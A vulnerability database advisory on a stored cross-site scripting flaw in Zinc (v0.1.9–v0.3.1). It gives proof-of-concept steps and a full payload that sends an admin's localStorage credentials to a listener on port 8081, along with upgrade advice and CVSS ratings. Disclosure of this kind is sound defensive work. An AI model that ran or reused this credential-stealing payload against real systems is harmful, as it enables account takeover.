Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: October 6, 2022
PoC Details1. Log in to the application as a user and create a new user.
2. Enter the XSS payload in the PoC section below in the user id field. The `localStorage.getItem("creds")` part of the payload needs to be encoded with ‘JSFuck’.
3. Start a listener on 8081 to receive the victim's credentials.
4. Now login as an admin user and navigate to the User tab.
5. Under the Actions tab, click the delete button.
"><img src=x onerror=this.src='http://127.0.0.1:8081/?x='+localStorage.getItem("creds")>
Affected EnvironmentsZinc versions v0.1.9 through v0.3.1
PreventionUpgrade to zinc version v0.3.2
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||Low|
|User Interaction (UI):||Required|